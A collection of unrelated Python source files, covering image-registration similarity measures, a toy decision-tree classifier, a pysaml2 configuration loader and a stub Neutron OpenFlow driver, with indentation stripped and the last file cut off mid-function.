def getWhiteSpace(self, max=None, WSchars=' \f\t'):
if not self.matchWhiteSpace(WSchars):
return ''
start = self.pos()
breakPoint = self.breakPoint()
if max is not None:
breakPoint = min(breakPoint, self.pos()+max)
while self.pos() < breakPoint:
self.advance()
if not self.matchWhiteSpace(WSchars):
break
return self.src()[start:self.pos()]
def matchNonWhiteSpace(self, WSchars=' \f\t\n\r'):
return self.atEnd() or not self.peek() in WSchars
def getNonWhiteSpace(self, WSchars=' \f\t\n\r'):
if not self.matchNonWhiteSpace(WSchars):
return ''
start = self.pos()
while self.pos() < self.breakPoint():
self.advance()
if not self.matchNonWhiteSpace(WSchars):
break
return self.src()[start:self.pos()]
|
|
from ._register import _L1_moments
import numpy as np
from scipy.ndimage import gaussian_filter
TINY = float(np.finfo(np.double).tiny)
SIGMA_FACTOR = 0.05
OVERLAP_MIN = 0.01
# A lambda function to force positive values
nonzero = lambda x: np.maximum(x, TINY)
def correlation2loglikelihood(rho2, npts, total_npts):
"""Re-normalize correlation.
Convert a squared normalized correlation to a composite
log-likelihood function of the registration transformation
parameters. The result is a function of both the input correlation
and the fraction of points in the image overlap.
See: Roche, medical image registration through statistical
inference, 2001.
Parameters
----------
rho2: float
Squared correlation measure
npts: int
Number of source image voxels that transform within the domain
of the reference image.
total_npts: int
Total number of source image voxels involved in computing the
correlation, including voxels transforming outside the target
image domain.
Returns
-------
ll: float
Logarithm of composite likelihood registration function.
"""
tmp = float(npts) / total_npts
return -.5 * tmp * np.log(nonzero(1 - rho2))
def dist2loss(q, qI=None, qJ=None):
"""
Convert a joint distribution model q(i,j) into a pointwise loss:
L(i,j) = - log q(i,j)/(q(i)q(j))
where q(i) = sum_j q(i,j) and q(j) = sum_i q(i,j)
See: Roche, medical image registration through statistical
inference, 2001.
"""
qT = q.T
if qI is None:
qI = q.sum(0)
if qJ is None:
qJ = q.sum(1)
q /= nonzero(qI)
qT /= nonzero(qJ)
return -np.log(nonzero(q))
class SimilarityMeasure(object):
"""
Template class
"""
def __init__(self, shape, total_npoints, renormalize=False, dist=None):
self.shape = shape
self.J, self.I = np.indices(shape)
self.renormalize = renormalize
if dist is None:
self.dist = None
else:
self.dist = dist.copy()
self.total_npoints = nonzero(float(total_npoints))
def loss(self, H):
return np.zeros(H.shape)
def npoints(self, H):
return H.sum()
def overlap_penalty(self, npts):
overlap = npts / self.total_npoints
return self.penalty * np.log(max(OVERLAP_MIN, overlap))
def __call__(self, H):
total_loss = np.sum(H * self.loss(H))
if self.renormalize:
total_loss /= self.total_npoints
else:
total_loss /= nonzero(self.npoints(H))
return -total_loss
class SupervisedLikelihoodRatio(SimilarityMeasure):
"""
Assume a joint intensity distribution model is given by self.dist
"""
def loss(self, H):
if not hasattr(self, 'L'):
if self.dist is None:
raise ValueError('SupervisedLikelihoodRatio: dist attribute cannot be None')
if not self.dist.shape == H.shape:
raise ValueError('SupervisedLikelihoodRatio: wrong shape for dist attribute')
self.L = dist2loss(self.dist)
return self.L
class MutualInformation(SimilarityMeasure):
"""
Use the normalized joint histogram as a distribution model
"""
def loss(self, H):
return dist2loss(H / nonzero(self.npoints(H)))
class ParzenMutualInformation(MutualInformation):
"""
Use Parzen windowing to estimate the distribution model
"""
def loss(self, H):
if not hasattr(self, 'sigma'):
self.sigma = SIGMA_FACTOR * np.array(H.shape)
npts = nonzero(self.npoints(H))
Hs = H / npts
gaussian_filter(Hs, sigma=self.sigma, mode='constant', output=Hs)
return dist2loss(Hs)
class DiscreteParzenMutualInformation(MutualInformation):
"""
Use Parzen windowing in the discrete case to estimate the
distribution model
"""
def loss(self, H):
if not hasattr(self, 'sigma'):
self.sigma = SIGMA_FACTOR * np.array(H.shape)
Hs = gaussian_filter(H, sigma=self.sigma, mode='constant')
Hs /= nonzero(Hs.sum())
return dist2loss(Hs)
class NormalizedMutualInformation(SimilarityMeasure):
"""
NMI = [H(I) + H(H)] / H(I,J)
Note the previous implementation returned the entropy correlation
coefficient:
ECC = 2*(1 - H(I,J) / [H(I) + H(J)])
which is equivalent to NMI (in the sense that it is an increasing
function of NMI) but is not the NMI measure as defined by
Studholme et al, Pattern Recognition, 1998.
"""
def __call__(self, H):
H = H / nonzero(self.npoints(H))
hI = H.sum(0)
hJ = H.sum(1)
entIJ = -np.sum(H * np.log(nonzero(H)))
entI = -np.sum(hI * np.log(nonzero(hI)))
entJ = -np.sum(hJ * np.log(nonzero(hJ)))
#return 2 * (1 - entIJ / nonzero(entI + entJ))
return (entI + entJ) / nonzero(entIJ)
class CorrelationCoefficient(SimilarityMeasure):
"""
Use a bivariate Gaussian as a distribution model
"""
def loss(self, H):
rho2 = self(H)
I = (self.I - self.mI) / np.sqrt(nonzero(self.vI))
J = (self.J - self.mJ) / np.sqrt(nonzero(self.vJ))
L = rho2 * I ** 2 + rho2 * J ** 2 - 2 * self.rho * I * J
tmp = nonzero(1. - rho2)
L *= .5 / tmp
L += .5 * np.log(tmp)
return L
def __call__(self, H):
npts = nonzero(self.npoints(H))
mI = np.sum(H * self.I) / npts
mJ = np.sum(H * self.J) / npts
vI = np.sum(H * (self.I) ** 2) / npts - mI ** 2
vJ = np.sum(H * (self.J) ** 2) / npts - mJ ** 2
cIJ = np.sum(H * self.J * self.I) / npts - mI * mJ
rho2 = (cIJ / nonzero(np.sqrt(vI * vJ))) ** 2
if self.renormalize:
rho2 = correlation2loglikelihood(rho2, npts, self.total_npoints)
return rho2
def correlation_ratio(H, Y):
"""Use a nonlinear regression model with Gaussian errors as a
distribution model.
Assume the input joint histogram has shape (dimX, dimY) where X is
the predictor and Y is the response variable.
Input array Y must be of same shape as H.
"""
npts_X = np.sum(H, 1)
tmp = nonzero(npts_X)
mY_X = np.sum(H * Y, 1) / tmp
vY_X = np.sum(H * (Y ** 2), 1) / tmp - mY_X ** 2
npts = np.sum(npts_X)
tmp = nonzero(npts)
hY = np.sum(H, 0)
hX = np.sum(H, 1)
mY = np.sum(hY * Y[0, :]) / tmp
vY = np.sum(hY * (Y[0, :] ** 2)) / tmp - mY ** 2
mean_vY_X = np.sum(hX * vY_X) / tmp
eta2 = 1. - mean_vY_X / nonzero(vY)
return eta2, npts
class CorrelationRatio(SimilarityMeasure):
def __call__(self, H):
eta2, npts = correlation_ratio(H, self.I)
if self.renormalize:
eta2 = correlation2loglikelihood(eta2, npts, self.total_npoints)
return eta2
class ReverseCorrelationRatio(SimilarityMeasure):
def __call__(self, H):
eta2, npts = correlation_ratio(H.T, self.J.T)
if self.renormalize:
eta2 = correlation2loglikelihood(eta2, npts, self.total_npoints)
return eta2
def correlation_ratio_L1(H):
"""
Use a nonlinear regression model with Laplace distributed errors
as a distribution model.
Assume the input joint histogram has shape (dimX, dimY) where X is
the predictor and Y is the response variable.
"""
moments = np.array([_L1_moments(H[x, :]) for x in range(H.shape[0])])
npts_X, mY_X, sY_X = moments[:, 0], moments[:, 1], moments[:, 2]
hY = np.sum(H, 0)
hX = np.sum(H, 1)
npts, mY, sY = _L1_moments(hY)
mean_sY_X = np.sum(hX * sY_X) / nonzero(npts)
tmp = mean_sY_X / nonzero(sY)
return 1 - tmp, npts
class CorrelationRatioL1(CorrelationRatio):
"""
Use a nonlinear regression model with Laplace distributed errors
as a distribution model
"""
def __call__(self, H):
eta, npts = correlation_ratio_L1(H)
if self.renormalize:
eta = -(npts / self.total_npoints) * np.log(nonzero(1 - eta))
return eta
class ReverseCorrelationRatioL1(CorrelationRatio):
"""
Use a nonlinear regression model with Laplace distributed errors
as a distribution model
"""
def __call__(self, H):
eta, npts = correlation_ratio_L1(H.T)
if self.renormalize:
eta = -(npts / self.total_npoints) * np.log(nonzero(1 - eta))
return eta
similarity_measures = {
'slr': SupervisedLikelihoodRatio,
'mi': MutualInformation,
'nmi': NormalizedMutualInformation,
'pmi': ParzenMutualInformation,
'dpmi': DiscreteParzenMutualInformation,
'cc': CorrelationCoefficient,
'cr': CorrelationRatio,
'crl1': CorrelationRatioL1,
'rcr': ReverseCorrelationRatio,
'rcrl1': ReverseCorrelationRatioL1}
|
|
'''
Created on Oct 4, 2015
@author: Amol
'''
from itertools import groupby
from math import log
my_data = [['slashdot', 'USA', 'yes', 18, 'None'],
['google', 'France', 'yes', 23, 'Premium'],
['digg', 'USA', 'yes', 24, 'Basic'],
['kiwitobes', 'France', 'yes', 23, 'Basic'],
['google', 'UK', 'no', 21, 'Premium'],
['(direct)', 'New Zealand', 'no', 12, 'None'],
['(direct)', 'UK', 'no', 21, 'Basic'],
['google', 'USA', 'no', 24, 'Premium'],
['slashdot', 'France', 'yes', 19, 'None'],
['digg', 'USA', 'no', 18, 'None'],
['google', 'UK', 'no', 18, 'None'],
['kiwitobes', 'UK', 'no', 19, 'None'],
['digg', 'New Zealand', 'yes', 12, 'Basic'],
['slashdot', 'UK', 'no', 21, 'None'],
['google', 'UK', 'yes', 18, 'Basic'],
['kiwitobes', 'France', 'yes', 19, 'Basic']]
class decisionnode:
#
# col: Column index of the criteria to be tested
# value: Value the column must match to get true result
# results: Dictionary of results, only for leaf nodes
# tb: Branch taken on true condition
# fb: Branch taken on false condition
#
def __init__(self, col=-1, value=None, results=None, tb=None, fb=None):
self.col = col
self.value = value
self.results = results
self.tb = tb
self.fb = fb
#
# Divide the given rows in two lists based on the following condition
# For numeric types, the split lists are based on the condition >= and < the given value
# for other types the check splits the rows in row based on whether the value is = or not = to the given value
#
def divideset(rows, column, value):
if isinstance(value, int) or isinstance(value, float):
split_function = lambda row: row[column] >= value
else:
split_function = lambda row: row[column] == value
return (
[row for row in rows if split_function(row)],
[row for row in rows if not split_function(row)]
)
#
# Get the dictionary of possible results. The function assumes the last column in each row is the result
#
def uniquecounts(rows):
values = sorted([(row[len(row) - 1], 0) for row in rows])
return dict([(k, len(list(v))) for k, v in groupby(values, lambda (k, _) : k)])
# Probability that a randomly placed item will
# be in the wrong category
# In this case it is as follows
# Item is None and Classified as Basic
# or
# Item is None and Classified as Premium
# or
# Item is Basic and Classified as None
# or
# Item is Basic and Classified as Premium
# or
# Item is Premium and Classified as None
# or
# Item is Premium and Classified as Basic
# Mathematically it is
#
# P(N)*P(B) + P(N)*P(P) + P(B)*P(N) + P(B)*P(P) + P(P)*P(N) + P(P)*P(B)
# where
# P(N) The Result is None,
# P(B) The Result is Basic, that is the membership chosen is Basic
# P(P) The Result is Premium, that is the membership chosen is Premium
#
# This however is simplified by doing the following 1 - ( P(N)*P(N) + P(B)*P(B) + P(P)*P(P) )
def giniimpurity(rows):
total = len(rows)
probs = map(lambda v: float(v) / total, uniquecounts(rows).values())
return 1 - sum([p * p for p in probs])
# Entropy is the amount of disorder in the set.
# It is defined as p(i) * log2(p(i)) for all outcomes
def entropy(rows):
total = len(rows)
probs = map(lambda v: float(v) / total, uniquecounts(rows).values())
return sum(map(lambda p:-p * log(p, 2), probs))
#
#
#
def buildtree(rows, scoref=entropy):
if len(rows) == 0 : return decisionnode()
current_score = scoref(rows)
# Initialize with defaults
best_gain = 0.0
best_criteria_col_index, best_criteria_col_value = (None, None)
best_true_set, best_false_set = (None, None)
# Algorithm is as follows
# 1. For each of the columns, find distinct values across the rows
# 2. Partition the set into two, called set1 and set2 based on each of these columns and the corresponding values they hold
# 3. Calculate the information gain as follows
# info_gain = current_score - P(set1) * scoref(set1) - P(set2) * scoref(set2)
# 4. If info gain is negative, no point going ahead, this is the leaf node. Set the result as the uniquecount(rows)
# 5. If however, the information gain is more than 0, then take the best set1 and set2 and the partitioning column and value
# as the criteria
# 6. Recursively call buildtree on set1 and set2 to get the true and false branch and return a decisionnode with the returned
# left and right tree and the best criteria column index and value
row_val_pair = frozenset([(i, row[i]) for i in range(len(rows[0]) - 1) for row in rows])
#row_val_pair = [(i, row[i]) for i in range(len(rows[0])) for row in rows]
n_rows = len(rows)
for column, value in row_val_pair:
t_set, f_set = divideset(rows, column, value)
p = float(len(t_set)) / n_rows
gain = current_score - p * scoref(t_set) - (1 - p) * scoref(f_set)
if gain > best_gain and len(t_set) > 0 and len(f_set) > 0:
best_gain = gain
best_criteria_col_index, best_criteria_col_value = (column, value)
best_true_set, best_false_set = (t_set, f_set)
if best_gain > 0:
# Intermediate node
tb = buildtree(best_true_set, scoref)
fb = buildtree(best_false_set, scoref)
return decisionnode(col=best_criteria_col_index, value=best_criteria_col_value, tb=tb, fb=fb)
else:
# It is a leaf node
return decisionnode(results=uniquecounts(rows))
#Taken as is
def printtree(tree, indent=''):
# Is this a leaf node?
if tree.results != None:
print str(tree.results)
else:
# Print the criteria
print str(tree.col) + ':' + str(tree.value) + '? '
# Print the branches
print indent + 'T->',
printtree(tree.tb, indent + ' ')
print indent + 'F->',
printtree(tree.fb, indent + ' ')
#Taken as is
def classify(observation,tree):
if tree.results!=None:
return tree.results
else:
v=observation[tree.col]
branch=None
if isinstance(v,int) or isinstance(v,float):
if v >= tree.value:
branch=tree.tb
else:
branch=tree.fb
else:
if v==tree.value:
branch=tree.tb
else:
branch=tree.fb
return classify(observation,branch)
# print(uniquecounts(my_data))
# print giniimpurity(my_data) # 0.6328125
# print entropy(my_data) #1.50524081494
# yes_list, no_list = divideset(my_data, 2 , 'yes')
# print entropy(yes_list)
# print giniimpurity(yes_list)
#
#
# Prune a tree
def prune(tree, mingain, scoref=entropy):
#TODO: Prune the tree here here
None
tree = buildtree(my_data)
#print "Built tree is "
printtree(tree)
print "Testing the tree from the training data, should get 100% accuracy"
total = 0
failure = 0
for data in my_data:
res = classify(data[0:4], tree)
total += 1
if res.keys()[0] != data[4]:
failure += 1
print "Total: %s, Passed: %s, Failed: %s with an accuracy of %s%s" %(total, (total - failure), failure, float( (total - failure) * 100 / total), '%')
print "Prediction for ['(direct)', 'USA', 'yes', 5] is %s"% (classify(['(direct)', 'USA', 'yes', 5], tree))
|
|
#!/usr/bin/env python
__author__ = 'rolandh'
import sys
import os
import re
import logging
import logging.handlers
from importlib import import_module
from saml2 import root_logger, BINDING_URI, SAMLError
from saml2 import BINDING_SOAP
from saml2 import BINDING_HTTP_REDIRECT
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_ARTIFACT
from saml2.attribute_converter import ac_factory
from saml2.assertion import Policy
from saml2.mdstore import MetadataStore
from saml2.virtual_org import VirtualOrg
logger = logging.getLogger(__name__)
from saml2 import md
from saml2 import saml
from saml2.extension import mdui
from saml2.extension import idpdisc
from saml2.extension import dri
from saml2.extension import mdattr
from saml2.extension import ui
import xmldsig
import xmlenc
ONTS = {
saml.NAMESPACE: saml,
mdui.NAMESPACE: mdui,
mdattr.NAMESPACE: mdattr,
dri.NAMESPACE: dri,
ui.NAMESPACE: ui,
idpdisc.NAMESPACE: idpdisc,
md.NAMESPACE: md,
xmldsig.NAMESPACE: xmldsig,
xmlenc.NAMESPACE: xmlenc
}
COMMON_ARGS = [
"entityid", "xmlsec_binary", "debug", "key_file", "cert_file",
"secret", "accepted_time_diff", "name", "ca_certs",
"description", "valid_for", "verify_ssl_cert",
"organization",
"contact_person",
"name_form",
"virtual_organization",
"logger",
"only_use_keys_in_metadata",
"logout_requests_signed",
"disable_ssl_certificate_validation",
"referred_binding",
"session_storage",
"entity_category",
"xmlsec_path",
"extension_schemas"
]
SP_ARGS = [
"required_attributes",
"optional_attributes",
"idp",
"aa",
"subject_data",
"want_assertions_signed",
"authn_requests_signed",
"name_form",
"endpoints",
"ui_info",
"discovery_response",
"allow_unsolicited",
"ecp",
"name_id_format",
"allow_unknown_attributes"
]
AA_IDP_ARGS = [
"want_authn_requests_signed",
"provided_attributes",
"subject_data",
"sp",
"scope",
"endpoints",
"metadata",
"ui_info",
"name_id_format",
"domain",
"name_qualifier",
"edu_person_targeted_id",
]
PDP_ARGS = ["endpoints", "name_form", "name_id_format"]
AQ_ARGS = ["endpoints"]
COMPLEX_ARGS = ["attribute_converters", "metadata", "policy"]
ALL = set(COMMON_ARGS + SP_ARGS + AA_IDP_ARGS + PDP_ARGS + COMPLEX_ARGS)
SPEC = {
"": COMMON_ARGS + COMPLEX_ARGS,
"sp": COMMON_ARGS + COMPLEX_ARGS + SP_ARGS,
"idp": COMMON_ARGS + COMPLEX_ARGS + AA_IDP_ARGS,
"aa": COMMON_ARGS + COMPLEX_ARGS + AA_IDP_ARGS,
"pdp": COMMON_ARGS + COMPLEX_ARGS + PDP_ARGS,
"aq": COMMON_ARGS + COMPLEX_ARGS + AQ_ARGS,
}
# --------------- Logging stuff ---------------
LOG_LEVEL = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
LOG_HANDLER = {
"rotating": logging.handlers.RotatingFileHandler,
"syslog": logging.handlers.SysLogHandler,
"timerotate": logging.handlers.TimedRotatingFileHandler,
"memory": logging.handlers.MemoryHandler,
}
LOG_FORMAT = "%(asctime)s %(name)s:%(levelname)s %(message)s"
_RPA = [BINDING_HTTP_REDIRECT, BINDING_HTTP_POST, BINDING_HTTP_ARTIFACT]
_PRA = [BINDING_HTTP_POST, BINDING_HTTP_REDIRECT, BINDING_HTTP_ARTIFACT]
_SRPA = [BINDING_SOAP, BINDING_HTTP_REDIRECT, BINDING_HTTP_POST,
BINDING_HTTP_ARTIFACT]
PREFERRED_BINDING = {
"single_logout_service": _SRPA,
"manage_name_id_service": _SRPA,
"assertion_consumer_service": _PRA,
"single_sign_on_service": _RPA,
"name_id_mapping_service": [BINDING_SOAP],
"authn_query_service": [BINDING_SOAP],
"attribute_service": [BINDING_SOAP],
"authz_service": [BINDING_SOAP],
"assertion_id_request_service": [BINDING_URI],
"artifact_resolution_service": [BINDING_SOAP],
"attribute_consuming_service": _RPA
}
class ConfigurationError(SAMLError):
pass
# -----------------------------------------------------------------
class Config(object):
def_context = ""
def __init__(self, homedir="."):
self._homedir = homedir
self.entityid = None
self.xmlsec_binary = None
self.xmlsec_path = []
self.debug = False
self.key_file = None
self.cert_file = None
self.secret = None
self.accepted_time_diff = None
self.name = None
self.ca_certs = None
self.verify_ssl_cert = False
self.description = None
self.valid_for = None
self.organization = None
self.contact_person = None
self.name_form = None
self.name_id_format = None
self.virtual_organization = None
self.logger = None
self.only_use_keys_in_metadata = True
self.logout_requests_signed = None
self.disable_ssl_certificate_validation = None
self.context = ""
self.attribute_converters = None
self.metadata = None
self.policy = None
self.serves = []
self.vorg = {}
self.preferred_binding = PREFERRED_BINDING
self.domain = ""
self.name_qualifier = ""
self.entity_category = ""
self.crypto_backend = 'xmlsec1'
self.scope = ""
self.allow_unknown_attributes = False
self.extension_schema = {}
def setattr(self, context, attr, val):
if context == "":
setattr(self, attr, val)
else:
setattr(self, "_%s_%s" % (context, attr), val)
def getattr(self, attr, context=None):
if context is None:
context = self.context
if context == "":
return getattr(self, attr, None)
else:
return getattr(self, "_%s_%s" % (context, attr), None)
def load_special(self, cnf, typ, metadata_construction=False):
for arg in SPEC[typ]:
try:
self.setattr(typ, arg, cnf[arg])
except KeyError:
pass
self.context = typ
self.load_complex(cnf, typ, metadata_construction=metadata_construction)
self.context = self.def_context
def load_complex(self, cnf, typ="", metadata_construction=False):
try:
self.setattr(typ, "policy", Policy(cnf["policy"]))
except KeyError:
pass
# for srv, spec in cnf["service"].items():
# try:
# self.setattr(srv, "policy",
# Policy(cnf["service"][srv]["policy"]))
# except KeyError:
# pass
try:
try:
acs = ac_factory(cnf["attribute_map_dir"])
except KeyError:
acs = ac_factory()
if not acs:
raise ConfigurationError("No attribute converters, something is wrong!!")
_acs = self.getattr("attribute_converters", typ)
if _acs:
_acs.extend(acs)
else:
self.setattr(typ, "attribute_converters", acs)
except KeyError:
pass
if not metadata_construction:
try:
self.setattr(typ, "metadata",
self.load_metadata(cnf["metadata"]))
except KeyError:
pass
def unicode_convert(self, item):
try:
return unicode(item, "utf-8")
except TypeError:
_uc = self.unicode_convert
if isinstance(item, dict):
return dict([(key, _uc(val)) for key, val in item.items()])
elif isinstance(item, list):
return [_uc(v) for v in item]
elif isinstance(item, tuple):
return tuple([_uc(v) for v in item])
else:
return item
def load(self, cnf, metadata_construction=False):
""" The base load method, loads the configuration
:param cnf: The configuration as a dictionary
:param metadata_construction: Is this only to be able to construct
metadata. If so some things can be left out.
:return: The Configuration instance
"""
_uc = self.unicode_convert
for arg in COMMON_ARGS:
if arg == "virtual_organization":
if "virtual_organization" in cnf:
for key, val in cnf["virtual_organization"].items():
self.vorg[key] = VirtualOrg(None, key, val)
continue
elif arg == "extension_schemas":
# List of filename of modules representing the schemas
if "extension_schemas" in cnf:
for mod_file in cnf["extension_schemas"]:
_mod = self._load(mod_file)
self.extension_schema[_mod.NAMESPACE] = _mod
try:
setattr(self, arg, _uc(cnf[arg]))
except KeyError:
pass
except TypeError: # Something that can't be a string
setattr(self, arg, cnf[arg])
if "service" in cnf:
for typ in ["aa", "idp", "sp", "pdp", "aq"]:
try:
self.load_special(
cnf["service"][typ], typ,
metadata_construction=metadata_construction)
self.serves.append(typ)
except KeyError:
pass
self.load_complex(cnf, metadata_construction=metadata_construction)
self.context = self.def_context
return self
def _load(self, fil):
head, tail = os.path.split(fil)
if head == "":
if sys.path[0] != ".":
sys.path.insert(0, ".")
else:
sys.path.insert(0, head)
return import_module(tail)
def load_file(self, config_file, metadata_construction=False):
if config_file.endswith(".py"):
config_file = config_file[:-3]
mod = self._load(config_file)
#return self.load(eval(open(config_file).read()))
return self.load(mod.CONFIG, metadata_construction)
def load_metadata(self, metadata_conf):
""" Loads metadata into an internal structure """
acs = self.attribute_converters
if acs is None:
raise ConfigurationError(
"Missing attribute converter specification")
try:
ca_certs = self.ca_certs
except:
ca_certs = None
try:
disable_validation = self.disable_ssl_certificate_validation
except:
disable_validation = False
mds = MetadataStore(
ONTS.values(), acs, self, ca_certs,
disable_ssl_certificate_validation=disable_validation)
mds.imp(metadata_conf)
return mds
def endpoint(self, service, binding=None, context=None):
""" Goes through the list of endpoint specifications for the
given type of service and returnes the first endpoint that matches
the given binding. If no binding is given any endpoint for that
service will be returned.
:param service: The service the endpoint should support
:param binding: The expected binding
:return: All the endpoints that matches the given restrictions
"""
spec = []
unspec = []
endps = self.getattr("endpoints", context)
if endps and service in endps:
for endpspec in endps[service]:
try:
endp, bind = endpspec
if binding is None or bind == binding:
spec.append(endp)
except ValueError:
unspec.append(endpspec)
if spec:
return spec
else:
return unspec
def log_handler(self):
try:
_logconf = self.logger
except KeyError:
return None
handler = None
for htyp in LOG_HANDLER:
if htyp in _logconf:
if htyp == "syslog":
args = _logconf[htyp]
if "socktype" in args:
import socket
if args["socktype"] == "dgram":
args["socktype"] = socket.SOCK_DGRAM
elif args["socktype"] == "stream":
args["socktype"] = socket.SOCK_STREAM
else:
raise ConfigurationError("Unknown socktype!")
try:
handler = LOG_HANDLER[htyp](**args)
except TypeError: # difference between 2.6 and 2.7
del args["socktype"]
handler = LOG_HANDLER[htyp](**args)
else:
handler = LOG_HANDLER[htyp](**_logconf[htyp])
break
if handler is None:
# default if rotating logger
handler = LOG_HANDLER["rotating"]()
if "format" in _logconf:
formatter = logging.Formatter(_logconf["format"])
else:
formatter = logging.Formatter(LOG_FORMAT)
handler.setFormatter(formatter)
return handler
def setup_logger(self):
if root_logger.level != logging.NOTSET: # Someone got there before me
return root_logger
_logconf = self.logger
if _logconf is None:
return root_logger
try:
root_logger.setLevel(LOG_LEVEL[_logconf["loglevel"].lower()])
except KeyError: # reasonable default
root_logger.setLevel(logging.INFO)
root_logger.addHandler(self.log_handler())
root_logger.info("Logging started")
return root_logger
class SPConfig(Config):
def_context = "sp"
def __init__(self):
Config.__init__(self)
def vo_conf(self, vo_name):
try:
return self.virtual_organization[vo_name]
except KeyError:
return None
def ecp_endpoint(self, ipaddress):
"""
Returns the entity ID of the IdP which the ECP client should talk to
:param ipaddress: The IP address of the user client
:return: IdP entity ID or None
"""
_ecp = self.getattr("ecp")
if _ecp:
for key, eid in _ecp.items():
if re.match(key, ipaddress):
return eid
return None
class IdPConfig(Config):
def_context = "idp"
def __init__(self):
Config.__init__(self)
def config_factory(typ, filename):
if typ == "sp":
conf = SPConfig().load_file(filename)
conf.context = typ
elif typ in ["aa", "idp", "pdp", "aq"]:
conf = IdPConfig().load_file(filename)
conf.context = typ
else:
conf = Config().load_file(filename)
conf.context = typ
return conf
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Ryota MIBU
import netaddr
from neutron.common import log as call_log
from neutron.openstack.common import log as logging
from neutron.openstack.common import uuidutils
from neutron.plugins.nec.common import exceptions as nexc
from neutron.plugins.nec import ofc_driver_base
LOG = logging.getLogger(__name__)
MAX_NUM_OPENFLOW_ROUTER = 2
class StubOFCDriver(ofc_driver_base.OFCDriverBase):
"""Stub OFC driver for testing.
This driver can be used not only for unit tests but also for real testing
as a logging driver. It stores the created resources on OFC and returns
them in get methods().
If autocheck is enabled, it checks whether the specified resource exists
in OFC and raises an exception if it is different from expected status.
"""
def __init__(self, conf):
self.autocheck = False
self.reset_all()
def reset_all(self):
self.ofc_tenant_dict = {}
self.ofc_network_dict = {}
self.ofc_port_dict = {}
self.ofc_filter_dict = {}
self.ofc_router_dict = {}
self.ofc_router_inf_dict = {}
self.ofc_router_route_dict = {}
def enable_autocheck(self):
self.autocheck = True
def disable_autocheck(self):
self.autocheck = False
@call_log.log
def create_tenant(self, description, tenant_id=None):
ofc_id = "ofc-" + tenant_id[:-4]
if self.autocheck:
if ofc_id in self.ofc_tenant_dict:
raise Exception(_('(create_tenant) OFC tenant %s '
'already exists') % ofc_id)
self.ofc_tenant_dict[ofc_id] = {'tenant_id': tenant_id,
'description': description}
return ofc_id
@call_log.log
def delete_tenant(self, ofc_tenant_id):
if ofc_tenant_id in self.ofc_tenant_dict:
del self.ofc_tenant_dict[ofc_tenant_id]
else:
if self.autocheck:
raise Exception(_('(delete_tenant) OFC tenant %s not found')
% ofc_tenant_id)
LOG.debug(_('delete_tenant: SUCCEED'))
@call_log.log
def create_network(self, ofc_tenant_id, description, network_id=None):
ofc_id = "ofc-" + network_id[:-4]
if self.autocheck:
if ofc_tenant_id not in self.ofc_tenant_dict:
raise Exception(_('(create_network) OFC tenant %s not found')
% ofc_tenant_id)
if ofc_id in self.ofc_network_dict:
raise Exception(_('(create_network) OFC network %s '
'already exists') % ofc_id)
self.ofc_network_dict[ofc_id] = {'tenant_id': ofc_tenant_id,
'network_id': network_id,
'description': description}
return ofc_id
@call_log.log
def update_network(self, ofc_network_id, description):
if self.autocheck:
if ofc_network_id not in self.ofc_network_dict:
raise Exception(_('(update_network) OFC network %s not found')
% ofc_network_id)
data = {'description': description}
self.ofc_network_dict[ofc_network_id].update(data)
LOG.debug(_('update_network: SUCCEED'))
@call_log.log
def delete_network(self, ofc_network_id):
if ofc_network_id in self.ofc_network_dict:
del self.ofc_network_dict[ofc_network_id]
else:
if self.autocheck:
raise Exception(_('(delete_network) OFC network %s not found')
% ofc_network_id)
LOG.debug(_('delete_network: SUCCEED'))
@call_log.log
def create_port(self, ofc_network_id, info, port_id=None, filters=None):
ofc_id = "ofc-" + port_id[:-4]
if self.autocheck:
if ofc_network_id not in self.ofc_network_dict:
raise Exception(_('(create_port) OFC network %s not found')
% ofc_network_id)
if ofc_id in self.ofc_port_dict:
raise Exception(_('(create_port) OFC port %s already exists')
% ofc_id)
self.ofc_port_dict[ofc_id] = {'network_id': ofc_network_id,
'port_id': port_id}
if filters:
self.ofc_port_dict[ofc_id]['filters'] = filters
return ofc_id
@call_log.log
def delete_port(self, ofc_port_id):
if ofc_port_id in self.ofc_port_dict:
del self.ofc_port_dict[ofc_port_id]
else:
if self.autocheck:
raise Exception(_('(delete_port) OFC port %s not found')
% ofc_port_id)
LOG.debug(_('delete_port: SUCCEED'))
@classmethod
def filter_supported(cls):
return True
def create_filter(self, ofc_network_id, filter_dict,
portinfo=None, filter_id=None, apply_ports=None):
return "ofc-" + filter_id[:-4]
def delete_filter(self, ofc_filter_id):
pass
def convert_ofc_tenant_id(self, context, ofc_tenant_id):
return ofc_tenant_id
def convert_ofc_network_id(self, context, ofc_network_id, tenant_id):
return ofc_network_id
def convert_ofc_port_id(self, context, ofc_port_id, tenant_id, network_id):
return ofc_port_id
def convert_ofc_filter_id(self, context, ofc_filter_id):
return ofc_filter_id
router_supported = True
router_nat_supported = True
@call_log.log
def create_router(self, ofc_tenant_id, router_id, description):
ofc_id = "ofc-" + router_id[:-4]
if self.autocheck:
if ofc_tenant_id not in self.ofc_tenant_dict:
raise Exception(_('(create_router) OFC tenant %s not found')
% ofc_tenant_id)
if ofc_id in self.ofc_router_dict:
raise Exception(_('(create_router) OFC router %s '
'already exists') % ofc_id)
if len(self.ofc_router_dict) >= MAX_NUM_OPENFLOW_ROUTER:
params = {'reason': _("Operation on OFC is failed"),
'status': 409}
raise nexc.OFCException(**params)
self.ofc_router_dict[ofc_id] = {'tenant_id': ofc_tenant_id,
'router_id': router_id,
'description': description}
return ofc_id
@call_log.log
def delete_router(self, ofc_router_id):
if ofc_router_id in self.ofc_router_dict:
del self.ofc_router_dict[ofc_router_id]
else:
if self.autocheck:
raise Exception(_('(delete_router) OFC router %s not found')
% ofc_router_id)
LOG.debug(_('delete_router: SUCCEED'))
@call_log.log
def add_router_interface(self, ofc_router_id, ofc_net_id,
ip_address=None, mac_address=None):
if_id = "ofc-" + uuidutils.generate_uuid()[:-4]
